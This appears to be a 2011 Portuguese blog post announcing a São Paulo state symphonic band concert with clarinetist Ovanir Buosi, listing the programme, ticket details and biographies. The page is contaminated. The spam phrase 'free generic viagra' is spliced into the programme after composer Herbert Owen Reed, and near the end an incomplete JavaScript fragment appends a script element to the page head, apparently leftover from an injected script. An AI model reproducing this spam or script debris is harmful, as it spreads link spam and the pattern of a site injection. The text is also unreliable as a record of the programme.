Escrito por em 10 out 2011 nas áreas Movimento

Banda Sinfônica do Estado de São Paulo recebe o clarinetista Ovanir Buosi, para o último concerto a Série Especial.

SERVIÇO

 

Theatro São Pedro
Rua Barra Funda, 171

Data: quarta-feira (19.10), às 20h30

Ingressos: R$ 20,00 (inteira) e R$ 10,00 (meia-entrada)

Vendas pelo Ingresso Rápido (4003-1212 ou www.ingressorapido.com.br) ou na bilheteria do Theatro São Pedro (11 3667-0499), de quarta a domingo das 14h às 19h

 

O concerto integra a Série Especial, que tem como característica a valorização de compositores e solistas brasileiros. A regência é do maestro Marcos Sadao Shirakawa. O concerto é realizado pelo Governo do Estado de São Paulo, por meio da Secretaria da Cultura, com produção da APAA – Associação Paulista dos Amigos da Arte.

Recebemos, para o último concerto da série este ano, o clarinetista Ovanir Buosi. Em 2011, a Série Especial, que valoriza os compositores e solistas brasileiros, também apresentou Flávio Gabriel, no trompete; Carlos Freitas, no trombone; Maria Luíza de Andrade Cameron, no violoncelo; Alex Klein, no oboé; Edson Beltrami, na flauta; além do maestro norte-americano Matthew George”, afirma o maestro Marcos Sadao Shirakawa.

 

PROGRAMA

Aaron Copland
Fanfarra para um Homem Comum

Morton Gould
Derivations for Clarinet and Band

Alexandre Travassos
Abertura Dramática

Frank Ticheli
Sanctuary for Concert Band

Herbert Owen Reed free generic viagra
La Fiesta Mexicana

 

Ovanir Buosi

Ovanir Buosi

Graduado pela Unesp, continuou a formação no Royal College of Music de Londres, onde estudou com o clarinetista Michael Collins. Em Londres, integrou a Southbank Sinfonia. Foi premiado nos concursos Jovens Solistas da Osesp, I Prêmio Weril para Instrumentistas de Sopro e no X Prêmio Eldorado de Música.

Como solista, atuou em orquestras como a Southbank Sinfonia, Guangxi Symphony Orchestra (China), Filarmônica de Belo Horizonte, Sinfônica da Bahia e Osesp. Como camerista, foi convidado da Oferenda Musical – Festival Internacional de Música de Câmara de São Paulo. Fez parte do grupo London Winds, Quarteto Sacconi (Londres), Quarteto Portinari, Quarteto Osesp e do Quinteto de Sopros de Curitiba.

Em 2010, participou como concertista convidado do 8º Festival Internacional de Clarinetas da China, realizado na cidade de Nanning, e ministrou Masterclass em Pequim a convite do Conservatório Nacional da China. Desde 1997 ocupa a cadeira de 1o. Clarinete Solista da Osesp. Atualmente é docente do Instituto Bacarelli, Conservatório Dramático e Musical Dr. Carlos de Campos, de Tatuí, e da Academia Osesp.

 

Marcos Sadao Shirakawa

Marcos Sadao Shirakawa

Bacharel em trombone pelo Departamento de Música da ECA-USP, estudou teoria e instrumento no Conservatório Dramático e Musical de São Paulo e no Conservatório Musical Brooklin Paulista. Primeiro trombone da Banda Sinfônica do Estado de São Paulo, integrou a Orquestra Experimental de Repertório e Orquestra Sinfônica de Santo André.

Atualmente é Diretor Artístico e Regente Titular da Banda Sinfônica do Estado de São Paulo e Regente da Banda Sinfônica de Cubatão. É também professor de trombone e música de câmara na Escola de Música do Estado de São Paulo – Tom Jobim e diretor do Programa BEC (Banda Escola de Cubatão).

 


Banda Sinfônica do Estado de São Paulo

Criada em 1989, a Banda Sinfônica do Estado de São Paulo, composta de 82 instrumentistas, é considerada um dos principais grupos sinfônicos do país. Em 1997, conquistou reconhecimento internacional após participar da 8ª Conferência da WASBE (World Association for Symphonic Bands and Ensembles), na Áustria.

Além do repertório original e de transcrições de obras consagradas, a Banda Sinfônica tem a preocupação de executar música genuinamente brasileira e estimula a criação de novas obras para essa formação instrumental. Parte deste trabalho está gravada nos CDs Suíte Tropical (2003) e Fantasia Amazônica (2004). A Banda Sinfônica tem direção artística e regência titular do maestro Marcos Sadao Shirakawa.

 if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário